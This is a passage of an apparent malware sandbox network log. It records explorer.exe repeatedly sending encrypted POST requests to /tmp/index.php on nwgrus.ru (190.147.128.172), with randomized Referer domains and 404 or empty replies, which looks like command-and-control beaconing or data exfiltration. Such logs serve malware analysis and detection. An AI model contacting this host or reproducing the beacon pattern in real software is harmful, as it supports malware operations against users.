3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:28:36.202023029 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bycmgoqasptpbarq.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 238 Host: nwgrus.ru
Oct 12, 2024 22:28:36.202045918 CEST	238	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 5d 0b b8 b8 Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vu]Db_c,-OjiT+R6TB>,EAyG]}$A;/kE'6K+OWYtgUfn
Oct 12, 2024 22:28:37.289573908 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:28:37 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49741	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:28:37.424860954 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mkmjhgiqxobee.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 173 Host: nwgrus.ru
Oct 12, 2024 22:28:37.424860954 CEST	173	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 4d 4e a3 87 Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vuMNr@fk~*3O 7fOzc\|WF.t\A$STqG:j5lV/
Oct 12, 2024 22:28:38.672749996 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:28:38 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49742	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:28:38.687381029 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://guwkkhaqmlu.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 128 Host: nwgrus.ru
Oct 12, 2024 22:28:38.687443972 CEST	128	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 50 51 d6 9f Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vuPQb-OS@j709w`P/=nt
Oct 12, 2024 22:28:39.768317938 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:28:39 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49743	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:28:39.777894974 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ipxaqeyacookwjhd.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 250 Host: nwgrus.ru
Oct 12, 2024 22:28:39.777895927 CEST	250	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 23 49 bc a7 Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vu#InkgUh({csMH4HI[&Hv$HB4@*Ffn8C/Y,w,rKF@5&arx0V"
Oct 12, 2024 22:28:40.835685968 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:28:40 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49744	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:28:41.085225105 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fjjppebnfln.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 285 Host: nwgrus.ru
Oct 12, 2024 22:28:41.085225105 CEST	285	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 4f 03 b2 f9 Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vuO@w~nf^q@~y:PZXtB v1,"mQ}WfaG8iV L:lsAxT)m(jH;u
Oct 12, 2024 22:28:42.151626110 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:28:41 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49745	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:28:42.162394047 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://giecrmryibj.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 262 Host: nwgrus.ru
Oct 12, 2024 22:28:42.162415981 CEST	262	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 49 48 c1 e0 Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vuIHnMdpRtA}Wf<,<ic)@#yB>^Vv%i6H^WKghg+U(>/aMqC*U(l~&Er
Oct 12, 2024 22:28:43.233310938 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:28:43 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49746	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:28:43.247734070 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ftxsovsyqtpojv.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 246 Host: nwgrus.ru
Oct 12, 2024 22:28:43.247759104 CEST	246	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 4b 2f aa f1 Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vuK/YsY_+)m\|:GIz;w0 AgK1)7aLE&VEXr0M\3wA%]xc*{R\
Oct 12, 2024 22:28:44.333525896 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:28:44 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49747	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:28:44.343616962 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bdnqdofcypmiflj.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 322 Host: nwgrus.ru
Oct 12, 2024 22:28:44.343703032 CEST	322	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 37 0c f9 b6 Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vu7y`avcY#u6{KKZu<)LD3#-&n\|q&{#7Gj8@e\ `8\;bnN-Ss
Oct 12, 2024 22:28:45.426671982 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:28:45 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49748	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:28:45.445760965 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://sfxppmjegqvmfflo.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 218 Host: nwgrus.ru
Oct 12, 2024 22:28:45.445760965 CEST	218	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 73 30 d4 8e Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vus0j~m'l)r'35h7+,VCO'lx}:3cBi_)clm%\:?KN7b
Oct 12, 2024 22:28:46.545255899 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:28:46 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49749	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:28:46.554502964 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bdvavhcwwpnmuonq.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 287 Host: nwgrus.ru
Oct 12, 2024 22:28:46.554517031 CEST	287	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 2d 49 bf 85 Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vu-IgQAf;ecQE<"jYDP1ly@Q'-^2v O sA+o`21/f-QUM;a^gcLT,
Oct 12, 2024 22:28:47.805634022 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:28:47 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49750	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:28:47.814610004 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qvliyttnwva.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 120 Host: nwgrus.ru
Oct 12, 2024 22:28:47.814631939 CEST	120	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 7e 4a e8 f9 Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vu~JdPCj}p\|XrY<hhI*)
Oct 12, 2024 22:28:48.887799025 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:28:48 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49751	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:28:48.896249056 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lcuvnbvrwwue.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 121 Host: nwgrus.ru
